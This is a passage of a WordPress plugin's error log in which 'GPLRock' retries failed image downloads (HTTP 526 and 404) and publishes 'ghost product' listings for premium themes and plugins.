(attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:31:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/callix---creative-agency-wordpress-theme--rtl-23891.webp for product callix-creative-agency-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:31:42 UTC] GPLRock: Image download failed for product callix-creative-agency-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:31:44 UTC] GPLRock: Image download failed for product callix-creative-agency-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:31:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/callix---creative-agency-wordpress-theme--rtl-23891.webp for product callix-creative-agency-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:31:46 UTC] GPLRock WARNING: Image download failed for product callix-creative-agency-wordpress-theme-rtl. URL: https://meldwp.com/wp-content/uploads/callix---creative-agency-wordpress-theme--rtl-23891.webp [02-Apr-2026 19:31:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: callix-creative-agency-wordpress-theme-rtl [02-Apr-2026 19:31:47 UTC] GPLRock: Image download failed for product anada-ai-agency-data-science-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:31:49 UTC] GPLRock: Image download failed for product anada-ai-agency-data-science-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:31:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/anada---ai-agency--data-science-wordpress-32457.webp for product anada-ai-agency-data-science-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:31:51 UTC] GPLRock: Image download failed for product anada-ai-agency-data-science-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:31:53 UTC] GPLRock: Image download failed for product anada-ai-agency-data-science-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:31:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/anada---ai-agency--data-science-wordpress-32457.webp for product anada-ai-agency-data-science-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:31:55 UTC] GPLRock WARNING: Image download failed for product anada-ai-agency-data-science-wordpress. URL: https://meldwp.com/wp-content/uploads/anada---ai-agency--data-science-wordpress-32457.webp [02-Apr-2026 19:31:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: anada-ai-agency-data-science-wordpress [02-Apr-2026 19:31:55 UTC] GPLRock: Image downloaded successfully for product brodus-personal-blog-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6bfa9818.webp [02-Apr-2026 19:31:55 UTC] GPLRock: Using pre-downloaded image for product brodus-personal-blog-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6bfa9818.webp [02-Apr-2026 19:31:55 UTC] GPLRock: Ghost product published with image - Product ID: brodus-personal-blog-wordpress-theme [02-Apr-2026 19:31:55 UTC] GPLRock: Image download failed for product anant-creative-elementor-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:31:57 UTC] GPLRock: Image download failed for product anant-creative-elementor-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:32:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/anant---creative-elementor-theme-19147.webp for product anant-creative-elementor-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:32:00 UTC] GPLRock: Image download failed for product anant-creative-elementor-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:32:02 UTC] GPLRock: Image download failed for product anant-creative-elementor-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:32:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/anant---creative-elementor-theme-19147.webp for product anant-creative-elementor-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:32:04 UTC] GPLRock WARNING: Image download failed for product anant-creative-elementor-theme. URL: https://meldwp.com/wp-content/uploads/anant---creative-elementor-theme-19147.webp [02-Apr-2026 19:32:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: anant-creative-elementor-theme [02-Apr-2026 19:32:04 UTC] GPLRock: Image download failed for product chakra-yoga-retreat-leisure-center-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:32:06 UTC] GPLRock: Image download failed for product chakra-yoga-retreat-leisure-center-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:32:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/chakra---yoga-retreat--leisure-center-wordpress-theme-32433.webp for product chakra-yoga-retreat-leisure-center-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:32:08 UTC] GPLRock: Image download failed for product chakra-yoga-retreat-leisure-center-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:32:10 UTC] GPLRock: Image download failed for product chakra-yoga-retreat-leisure-center-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:32:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/chakra---yoga-retreat--leisure-center-wordpress-theme-32433.webp for product chakra-yoga-retreat-leisure-center-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:32:13 UTC] GPLRock WARNING: Image download failed for product chakra-yoga-retreat-leisure-center-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/chakra---yoga-retreat--leisure-center-wordpress-theme-32433.webp [02-Apr-2026 19:32:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: chakra-yoga-retreat-leisure-center-wordpress-theme [02-Apr-2026 19:32:13 UTC] GPLRock: Image download failed for product aarhus-modern-architecture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:32:15 UTC] GPLRock: Image download failed for product aarhus-modern-architecture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:32:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aarhus---modern-architecture-wordpress-theme-19217.webp for product aarhus-modern-architecture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:32:17 UTC] GPLRock: Image download failed for product aarhus-modern-architecture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:32:19 UTC] GPLRock: Image download failed for product aarhus-modern-architecture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:32:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aarhus---modern-architecture-wordpress-theme-19217.webp for product aarhus-modern-architecture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:32:21 UTC] GPLRock WARNING: Image download failed for product aarhus-modern-architecture-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/aarhus---modern-architecture-wordpress-theme-19217.webp [02-Apr-2026 19:32:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: aarhus-modern-architecture-wordpress-theme [02-Apr-2026 19:32:21 UTC] GPLRock: Image download failed for product stardust-multi-purpose-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:32:24 UTC] GPLRock: Image download failed for product stardust-multi-purpose-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:32:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stardust---multi-purpose-portfolio-wordpress-theme-1162.webp for product stardust-multi-purpose-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:32:26 UTC] GPLRock: Image download failed for product stardust-multi-purpose-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:32:28 UTC] GPLRock: Image download failed for product stardust-multi-purpose-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:32:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stardust---multi-purpose-portfolio-wordpress-theme-1162.webp for product stardust-multi-purpose-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:32:30 UTC] GPLRock WARNING: Image download failed for product stardust-multi-purpose-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/stardust---multi-purpose-portfolio-wordpress-theme-1162.webp [02-Apr-2026 19:32:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: stardust-multi-purpose-portfolio-wordpress-theme [02-Apr-2026 19:32:30 UTC] GPLRock: Image download failed for product godlike-game-theme-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:32:32 UTC] GPLRock: Image download failed for product godlike-game-theme-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:32:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/godlike---game-theme-for-wordpress-24169.webp for product godlike-game-theme-for-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:32:34 UTC] GPLRock: Image download failed for product godlike-game-theme-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:32:37 UTC] GPLRock: Image download failed for product godlike-game-theme-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:32:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/godlike---game-theme-for-wordpress-24169.webp for product godlike-game-theme-for-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:32:39 UTC] GPLRock WARNING: Image download failed for product godlike-game-theme-for-wordpress. URL: https://meldwp.com/wp-content/uploads/godlike---game-theme-for-wordpress-24169.webp [02-Apr-2026 19:32:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: godlike-game-theme-for-wordpress [02-Apr-2026 19:32:39 UTC] GPLRock: Image download failed for product minimalin-minimal-multipurpose-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:32:41 UTC] GPLRock: Image download failed for product minimalin-minimal-multipurpose-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:32:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/minimalin---minimal-multipurpose-woocommerce-wordpress-theme-10211.webp for product minimalin-minimal-multipurpose-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:32:43 UTC] GPLRock: Image download failed for product minimalin-minimal-multipurpose-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:32:45 UTC] GPLRock: Image download failed for product minimalin-minimal-multipurpose-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:32:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/minimalin---minimal-multipurpose-woocommerce-wordpress-theme-10211.webp for product minimalin-minimal-multipurpose-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:32:47 UTC] GPLRock WARNING: Image download failed for product minimalin-minimal-multipurpose-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/minimalin---minimal-multipurpose-woocommerce-wordpress-theme-10211.webp [02-Apr-2026 19:32:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: minimalin-minimal-multipurpose-woocommerce-wordpress-theme [02-Apr-2026 19:32:48 UTC] GPLRock: Image download failed for product onnat-digital-agency-creative-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:32:50 UTC] GPLRock: Image download failed for product onnat-digital-agency-creative-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:32:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/onnat--digital-agency--creative-wordpress-theme-8188.webp for product onnat-digital-agency-creative-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:32:52 UTC] GPLRock: Image download failed for product onnat-digital-agency-creative-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:32:54 UTC] GPLRock: Image download failed for product onnat-digital-agency-creative-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:32:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/onnat--digital-agency--creative-wordpress-theme-8188.webp for product onnat-digital-agency-creative-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:32:56 UTC] GPLRock WARNING: Image download failed for product onnat-digital-agency-creative-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/onnat--digital-agency--creative-wordpress-theme-8188.webp [02-Apr-2026 19:32:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: onnat-digital-agency-creative-wordpress-theme [02-Apr-2026 19:33:04 UTC] GPLRock: Image downloaded successfully for product evomind-home-healthcare-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-457a94db.webp [02-Apr-2026 19:33:04 UTC] GPLRock: Using pre-downloaded image for product evomind-home-healthcare-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-457a94db.webp [02-Apr-2026 19:33:04 UTC] GPLRock: Ghost product published with image - Product ID: evomind-home-healthcare-services-elementor-template-kit [02-Apr-2026 19:33:06 UTC] GPLRock: Image downloaded successfully for product everly-blog-magazine-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d18d3d7b.webp [02-Apr-2026 19:33:06 UTC] GPLRock: Using pre-downloaded image for product everly-blog-magazine-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d18d3d7b.webp [02-Apr-2026 19:33:06 UTC] GPLRock: Ghost product published with image - Product ID: everly-blog-magazine-elementor-template-kit [02-Apr-2026 19:33:07 UTC] GPLRock: Image downloaded successfully for product eventico-event-conference-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1b2e7456.webp [02-Apr-2026 19:33:07 UTC] GPLRock: Using pre-downloaded image for product eventico-event-conference-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1b2e7456.webp [02-Apr-2026 19:33:07 UTC] GPLRock: Ghost product published with image - Product ID: eventico-event-conference-elementor-template-kit [02-Apr-2026 19:33:09 UTC] GPLRock: Image downloaded successfully for product eventer-meetup-conference-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-034e3def.webp [02-Apr-2026 19:33:09 UTC] GPLRock: Using pre-downloaded image for product eventer-meetup-conference-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-034e3def.webp [02-Apr-2026 19:33:09 UTC] GPLRock: Ghost product published with image - Product ID: eventer-meetup-conference-elementor-template-kit [02-Apr-2026 19:33:10 UTC] GPLRock: Image downloaded successfully for product eventech-tech-event-conference-expo-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8c5ad8f4.jpg [02-Apr-2026 19:33:11 UTC] GPLRock: Using pre-downloaded image for product eventech-tech-event-conference-expo-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8c5ad8f4.jpg [02-Apr-2026 19:33:11 UTC] GPLRock: Ghost product published with image - Product ID: eventech-tech-event-conference-expo-elementor-template-kit [02-Apr-2026 19:33:12 UTC] GPLRock: Image downloaded successfully for product evenday-event-management-expo-orgaziner-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-893e2564.webp [02-Apr-2026 19:33:12 UTC] GPLRock: Using pre-downloaded image for product evenday-event-management-expo-orgaziner-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-893e2564.webp [02-Apr-2026 19:33:12 UTC] GPLRock: Ghost product published with image - Product ID: evenday-event-management-expo-orgaziner-elementor-template-kit [02-Apr-2026 19:33:13 UTC] GPLRock: Image downloaded successfully for product evania-yoga-studio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-36c00829.webp [02-Apr-2026 19:33:14 UTC] GPLRock: Using pre-downloaded image for product evania-yoga-studio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-36c00829.webp [02-Apr-2026 19:33:14 UTC] GPLRock: Ghost product published with image - Product ID: evania-yoga-studio-elementor-template-kit [02-Apr-2026 19:33:15 UTC] GPLRock: Image downloaded successfully for product eunoia-tech-company-digital-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-237b258c.webp [02-Apr-2026 19:33:15 UTC] GPLRock: Using pre-downloaded image for product eunoia-tech-company-digital-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-237b258c.webp [02-Apr-2026 19:33:15 UTC] GPLRock: Ghost product published with image - Product ID: eunoia-tech-company-digital-service-elementor-template-kit [02-Apr-2026 19:33:16 UTC] GPLRock: Image downloaded successfully for product eti-fashion-store-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e2b9430c.webp [02-Apr-2026 19:33:16 UTC] GPLRock: Using pre-downloaded image for product eti-fashion-store-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e2b9430c.webp [02-Apr-2026 19:33:16 UTC] GPLRock: Ghost product published with image - Product ID: eti-fashion-store-elementor-template-kit [02-Apr-2026 19:33:18 UTC] GPLRock: Image downloaded successfully for product eternal-ecommerce-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5e1101af.webp [02-Apr-2026 19:33:18 UTC] GPLRock: Using pre-downloaded image for product eternal-ecommerce-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5e1101af.webp [02-Apr-2026 19:33:18 UTC] GPLRock: Ghost product published with image - Product ID: eternal-ecommerce-elementor-template-kit [02-Apr-2026 19:36:39 UTC] GPLRock: Image downloaded successfully for product wp-courseware-wordpress-lms-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7367c5a9.jpg [02-Apr-2026 19:36:39 UTC] GPLRock: Using pre-downloaded image for product wp-courseware-wordpress-lms-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7367c5a9.jpg [02-Apr-2026 19:36:39 UTC] GPLRock: Ghost product published with image - Product ID: wp-courseware-wordpress-lms-plugin [02-Apr-2026 19:36:41 UTC] GPLRock: Image download failed for product thrive-theme-builder (attempt 1/3). HTTP Code: 404, Error: . Retrying... [02-Apr-2026 19:36:45 UTC] GPLRock: Image download failed for product thrive-theme-builder (attempt 2/3). HTTP Code: 404, Error: . Retrying... [02-Apr-2026 19:36:49 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/Thrive-Theme-Builder.jpg for product thrive-theme-builder after 3 attempts. HTTP Code: 404, Error: [02-Apr-2026 19:36:50 UTC] GPLRock: Image download failed for product thrive-theme-builder (attempt 1/3). HTTP Code: 404, Error: . Retrying... [02-Apr-2026 19:36:54 UTC] GPLRock: Image download failed for product thrive-theme-builder (attempt 2/3). HTTP Code: 404, Error: . Retrying... [02-Apr-2026 19:36:58 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/Thrive-Theme-Builder.jpg for product thrive-theme-builder after 3 attempts. HTTP Code: 404, Error: [02-Apr-2026 19:36:58 UTC] GPLRock WARNING: Image download failed for product thrive-theme-builder. URL: https://www.gplrock.com/wp-content/uploads/2020/07/Thrive-Theme-Builder.jpg [02-Apr-2026 19:36:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: thrive-theme-builder [02-Apr-2026 19:37:00 UTC] GPLRock: Image downloaded successfully for product oxygen-builder-the-visual-website-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3264566b.jpg [02-Apr-2026 19:37:00 UTC] GPLRock: Using pre-downloaded image for product oxygen-builder-the-visual-website-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3264566b.jpg [02-Apr-2026 19:37:00 UTC] GPLRock: Ghost product published with image - Product ID: oxygen-builder-the-visual-website-builder [02-Apr-2026 19:37:02 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-social-login (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3ac708c4.jpg [02-Apr-2026 19:37:02 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-social-login: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3ac708c4.jpg [02-Apr-2026 19:37:02 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-social-login [02-Apr-2026 19:37:03 UTC] GPLRock: Image downloaded successfully for product woocommerce-free-gift-coupons (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a47d02e7.jpg [02-Apr-2026 19:37:04 UTC] GPLRock: Using pre-downloaded image for product woocommerce-free-gift-coupons: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a47d02e7.jpg [02-Apr-2026 19:37:04 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-free-gift-coupons [02-Apr-2026 19:37:05 UTC] GPLRock: Image downloaded successfully for product woocommerce-lightspeed-pos-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e664bb59.jpg [02-Apr-2026 19:37:05 UTC] GPLRock: Using pre-downloaded image for product woocommerce-lightspeed-pos-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e664bb59.jpg [02-Apr-2026 19:37:05 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-lightspeed-pos-integration [02-Apr-2026 19:37:06 UTC] GPLRock: Image downloaded successfully for product woocommerce-msrp-pricing (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-711dbf12.jpg [02-Apr-2026 19:37:06 UTC] GPLRock: Using pre-downloaded image for product woocommerce-msrp-pricing: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-711dbf12.jpg [02-Apr-2026 19:37:06 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-msrp-pricing [02-Apr-2026 19:37:08 UTC] GPLRock: Image downloaded successfully for product woocommerce-cart-reports (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-59831e12.jpg [02-Apr-2026 19:37:08 UTC] GPLRock: Using pre-downloaded image for product woocommerce-cart-reports: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-59831e12.jpg [02-Apr-2026 19:37:08 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-cart-reports [02-Apr-2026 19:37:09 UTC] GPLRock: Image downloaded successfully for product wp-lister-pro-for-amazon-by-wp-lab (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-01d857eb.jpg [02-Apr-2026 19:37:09 UTC] GPLRock: Using pre-downloaded image for product wp-lister-pro-for-amazon-by-wp-lab: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-01d857eb.jpg [02-Apr-2026 19:37:09 UTC] GPLRock: Ghost product published with image - Product ID: wp-lister-pro-for-amazon-by-wp-lab [02-Apr-2026 19:37:11 UTC] GPLRock: Image downloaded successfully for product studiopress-elegance-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-526f526c.jpg [02-Apr-2026 19:37:11 UTC] GPLRock: Using pre-downloaded image for product studiopress-elegance-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-526f526c.jpg [02-Apr-2026 19:37:11 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-elegance-pro-genesis-wordpress-theme [02-Apr-2026 20:05:33 UTC] GPLRock: Image download failed for product steak-in-restaurant-cafe-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:05:35 UTC] GPLRock: Image download failed for product steak-in-restaurant-cafe-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:05:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/steak-in---restaurant--cafe-wordpress-theme-22299.webp for product steak-in-restaurant-cafe-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:05:37 UTC] GPLRock: Image download failed for product steak-in-restaurant-cafe-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:05:39 UTC] GPLRock: Image download failed for product steak-in-restaurant-cafe-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:05:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/steak-in---restaurant--cafe-wordpress-theme-22299.webp for product steak-in-restaurant-cafe-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:05:42 UTC] GPLRock WARNING: Image download failed for product steak-in-restaurant-cafe-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/steak-in---restaurant--cafe-wordpress-theme-22299.webp [02-Apr-2026 20:05:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: steak-in-restaurant-cafe-wordpress-theme [02-Apr-2026 20:05:42 UTC] GPLRock: Image download failed for product finlon-loan-credit-repair-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:05:44 UTC] GPLRock: Image download failed for product finlon-loan-credit-repair-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:05:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/finlon---loan--credit-repair-wordpress-theme-32087.webp for product finlon-loan-credit-repair-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:05:46 UTC] GPLRock: Image download failed for product finlon-loan-credit-repair-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:05:48 UTC] GPLRock: Image download failed for product finlon-loan-credit-repair-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:05:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/finlon---loan--credit-repair-wordpress-theme-32087.webp for product finlon-loan-credit-repair-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:05:50 UTC] GPLRock WARNING: Image download failed for product finlon-loan-credit-repair-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/finlon---loan--credit-repair-wordpress-theme-32087.webp [02-Apr-2026 20:05:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: finlon-loan-credit-repair-wordpress-theme [02-Apr-2026 20:05:51 UTC] GPLRock: Image download failed for product bascart-multivendor-marketplace-woocommerce-wordpress-theme-with-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:05:53 UTC] GPLRock: Image download failed for product bascart-multivendor-marketplace-woocommerce-wordpress-theme-with-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:05:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bascart---multivendor-marketplace--woocommerce-wordpress-theme-with-builder-2524.webp for product bascart-multivendor-marketplace-woocommerce-wordpress-theme-with-builder after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:05:55 UTC] GPLRock: Image download failed for product bascart-multivendor-marketplace-woocommerce-wordpress-theme-with-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:05:57 UTC] GPLRock: Image download failed for product bascart-multivendor-marketplace-woocommerce-wordpress-theme-with-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:05:59 UTC] GPLRock Error: Failed to download image from 